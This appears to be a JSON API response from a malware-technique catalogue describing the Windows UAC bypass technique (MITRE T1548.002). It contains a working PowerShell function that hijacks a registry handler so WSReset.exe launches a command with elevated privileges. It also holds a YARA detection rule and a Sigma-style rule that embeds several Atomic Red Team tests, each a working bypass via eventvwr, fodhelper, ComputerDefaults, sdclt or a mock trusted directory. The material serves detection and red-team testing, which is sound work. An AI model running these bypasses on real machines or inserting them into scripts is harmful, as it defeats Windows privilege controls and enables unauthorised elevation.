GET /api/techniques/152/
HTTP 200 OK
Allow: GET, PUT, PATCH, DELETE, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "name": "Bypass User Account Control",
    "category": [
        "https://search.unprotect.it/api/categories/10/"
    ],
    "description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system.  Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\r\n\r\nThe impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.",
    "resources": "https://attack.mitre.org/techniques/T1548/002/",
    "tags": "uac, mitre",
    "snippets": [
        {
            "language": "https://search.unprotect.it/api/snippet_languages/8/",
            "author": "https://search.unprotect.it/api/snippet_authors/6/",
            "technique": "https://search.unprotect.it/api/techniques/152/",
            "description": "",
            "plain_code": "<#\r\n.SYNOPSIS\r\nFileless UAC Bypass by Abusing Shell API\r\n.PARAMETER Command\r\nSpecifies the command you would like to run in high integrity context.\r\n \r\n.EXAMPLE\r\nInvoke-WSResetBypass -Command \"C:\\Windows\\System32\\cmd.exe /c start cmd.exe\"\r\nThis will effectivly start cmd.exe in high integrity context.\r\n.NOTES\r\nThis UAC bypass has been tested on the following:\r\n - Windows 10 Version 1803 OS Build 17134.590\r\n - Windows 10 Version 1809 OS Build 17763.316\r\n#>\r\nfunction Invoke-WSResetBypass {\r\n      Param (\r\n      [String]$Command = \"C:\\Windows\\System32\\cmd.exe /c start cmd.exe\"\r\n      )\r\n      $CommandPath = \"HKCU:\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\"\r\n      $filePath = \"HKCU:\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\"\r\n      New-Item $CommandPath -Force | Out-Null\r\n      New-ItemProperty -Path $CommandPath -Name \"DelegateExecute\" -Value \"\" -Force | Out-Null\r\n      Set-ItemProperty -Path $CommandPath -Name \"(default)\" -Value $Command -Force -ErrorAction SilentlyContinue | Out-Null\r\n      Write-Host \"[+] Registry entry has been created successfully!\"\r\n      $Process = Start-Process -FilePath \"C:\\Windows\\System32\\WSReset.exe\" -WindowStyle Hidden\r\n      Write-Host \"[+] Starting WSReset.exe\"\r\n      Write-Host \"[+] Triggering payload..\"\r\n      Start-Sleep -Seconds 5\r\n      if (Test-Path $filePath) {\r\n      Remove-Item $filePath -Recurse -Force\r\n      Write-Host \"[+] Cleaning up registry entry\"\r\n      }\r\n}"
        }
    ],
    "detection_rules": [
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "UNPROTECT_uac_bypass",
            "rule": "rule UNPROTECT_UAC_Bypass_Strings {\r\n    meta:\r\n        description = \"Rule to detect UAC bypass attempt by regarding strings\"\r\n        author = \"Thibault Seret\"\r\n        date = \"2020-04-10\"\r\n    strings:\r\n        $s1 = \"SeIncreaseQuotaPrivilege\" ascii fullword\r\n        $s2 = \"SeSecurityPrivilege\" ascii fullword\r\n        $s3 = \"SeTakeOwnershipPrivilege\" ascii fullword\r\n        $s4 = \"SeLoadDriverPrivilege\" ascii fullword\r\n        $s5 = \"SeSystemProfilePrivilege\" ascii fullword\r\n        $s6 = \"SeSystemtimePrivilege\" ascii fullword\r\n        $s7 = \"SeProfileSingleProcessPrivilege\" ascii fullword\r\n        $s8 = \"SeIncreaseBasePriorityPrivilege\" ascii fullword\r\n        $s9 = \"SeCreatePagefilePrivilege\" ascii fullword\r\n        $s10 = \"SeBackupPrivilege\" ascii fullword\r\n        $s11 = \"SeRestorePrivilege\" ascii fullword\r\n        $s12 = \"SeShutdownPrivilege\" ascii fullword\r\n        $s13 = \"SeDebugPrivilege\" ascii fullword\r\n        $s14 = \"SeSystemEnvironmentPrivilege\" ascii fullword\r\n        $s15 = \"SeChangeNotifyPrivilege\" ascii fullword\r\n        $s16 = \"SeRemoteShutdownPrivilege\" ascii fullword\r\n        $s17 = \"SeUndockPrivilege\" ascii fullword\r\n        $s18 = \"SeManageVolumePrivilege\" ascii fullword\r\n        $s19 = \"SeImpersonatePrivilege\" ascii fullword\r\n        $s20 = \"SeCreateGlobalPrivilege\" ascii fullword\r\n        $s21 = \"SeIncreaseWorkingSetPrivilege\" ascii fullword\r\n        $s22 = \"SeTimeZonePrivilege\" ascii fullword\r\n        $s23 = \"SeCreateSymbolicLinkPrivilege\" ascii fullword\r\n    condition:\r\n        5 of them\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "uac_bypass",
            "rule": "title: Fodhelper UAC Bypass\r\nstatus: experimental\r\ndescription: Fodhelper UAC Bypass\r\nauthor: Joe Security\r\ndate: 2020-07-30\r\nid: 200082\r\nthreatname:\r\nbehaviorgroup: 26\r\nclassification: 7\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*reg add*hkcu\\software\\classes\\ms-settings\\shell\\open\\command*'\r\n      condition: selection\r\nlevel: critical\r\nattack_technique: T1548.002\r\ndisplay_name: 'Abuse Elevation Control Mechanism: Bypass User Access Control'\r\natomic_tests:\r\n- name: Bypass UAC using Event Viewer (cmd)\r\n  auto_generated_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9\r\n  description: |\r\n    Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\r\n    Upon execution command prompt should be launched with administrative privelages\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      reg.exe add hkcu\\software\\classes\\mscfile\\shell\\open\\command /ve /d \"#{executable_binary}\" /f\r\n      cmd.exe /c eventvwr.msc\r\n    cleanup_command: |\r\n      reg.exe delete hkcu\\software\\classes\\mscfile /f >nul 2>&1\r\n    name: command_prompt\r\n- name: Bypass UAC using Event Viewer (PowerShell)\r\n  auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b\r\n  description: |\r\n    PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\r\n    Upon execution command prompt should be launched with administrative privelages\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      New-Item \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Force\r\n      Set-ItemProperty \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\r\n      Start-Process \"C:\\Windows\\System32\\eventvwr.msc\"\r\n    cleanup_command: |\r\n      Remove-Item \"HKCU:\\software\\classes\\mscfile\" -force -Recurse -ErrorAction Ignore\r\n    name: powershell\r\n- name: Bypass UAC using Fodhelper\r\n  auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182\r\n  description: |\r\n    Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.\r\n    Upon execution, \"The operation completed successfully.\" will be shown twice and command prompt will be opened.\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      reg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /ve /d \"#{executable_binary}\" /f\r\n      reg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /v \"DelegateExecute\" /f\r\n      fodhelper.exe\r\n    cleanup_command: |\r\n      reg.exe delete hkcu\\software\\classes\\ms-settings /f >nul 2>&1\r\n    name: command_prompt\r\n- name: Bypass UAC using Fodhelper - PowerShell\r\n  auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa\r\n  description: |\r\n    PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.\r\n    Upon execution command prompt will be opened.\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\r\n      New-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\r\n      Set-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\r\n      Start-Process \"C:\\Windows\\System32\\fodhelper.exe\"\r\n    cleanup_command: |\r\n      Remove-Item \"HKCU:\\software\\classes\\ms-settings\" -force -Recurse -ErrorAction Ignore\r\n    name: powershell\r\n- name: Bypass UAC using ComputerDefaults (PowerShell)\r\n  auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f\r\n  description: |\r\n    PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10\r\n    Upon execution administrative command prompt should open\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\r\n      New-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\r\n      Set-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\r\n      Start-Process \"C:\\Windows\\System32\\ComputerDefaults.exe\"\r\n    cleanup_command: |\r\n      Remove-Item \"HKCU:\\software\\classes\\ms-settings\" -force -Recurse -ErrorAction Ignore\r\n    name: powershell\r\n    elevation_required: true\r\n- name: Bypass UAC by Mocking Trusted Directories\r\n  auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1\r\n  description: |\r\n    Creates a fake \"trusted directory\" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems\r\n    Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      mkdir \"\\\\?\\C:\\Windows \\System32\\\"\r\n      copy \"#{executable_binary}\" \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\r\n      mklink c:\\testbypass.exe \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\r\n    cleanup_command: |\r\n      rd \"\\\\?\\C:\\Windows \\\" /S /Q >nul 2>nul\r\n      del \"c:\\testbypass.exe\" >nul 2>nul\r\n    name: command_prompt\r\n    elevation_required: true\r\n- name: Bypass UAC using sdclt DelegateExecute\r\n  auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7\r\n  description: |\r\n    Bypasses User Account Control using a fileless method, registry only. \r\n    Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe\r\n    [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)\r\n    Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    command.to.execute:\r\n      description: Command to execute\r\n      type: string\r\n      default: cmd.exe /c notepad.exe\r\n  executor:\r\n    command: |\r\n      New-Item -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Value '#{command.to.execute}'\r\n      New-ItemProperty -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Name \"DelegateExecute\"\r\n      Start-Process -FilePath $env:windir\\system32\\sdclt.exe\r\n      Start-Sleep -s 3\r\n    cleanup_command: |\r\n      Remove-Item -Path \"HKCU:\\Software\\Classes\\Folder\" -Recurse -Force -ErrorAction Ignore\r\n    name: powershell"
        }
    ]
}